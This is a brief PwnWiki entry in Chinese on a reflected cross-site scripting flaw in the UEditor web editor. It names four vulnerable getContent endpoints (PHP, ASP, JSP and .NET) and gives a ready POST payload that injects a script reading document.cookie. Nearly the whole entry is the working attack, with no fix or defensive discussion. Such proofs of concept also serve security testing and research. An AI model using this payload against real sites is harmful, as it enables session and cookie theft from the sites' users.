Ueditor 反射型XSS漏洞

From PwnWiki

漏洞位置

/php/getContent.php /asp/getContent.asp /jsp/getContent.jsp /net/getContent.ashx

XSS

POST:

myEditor=<script>alert(document.cookie)</script>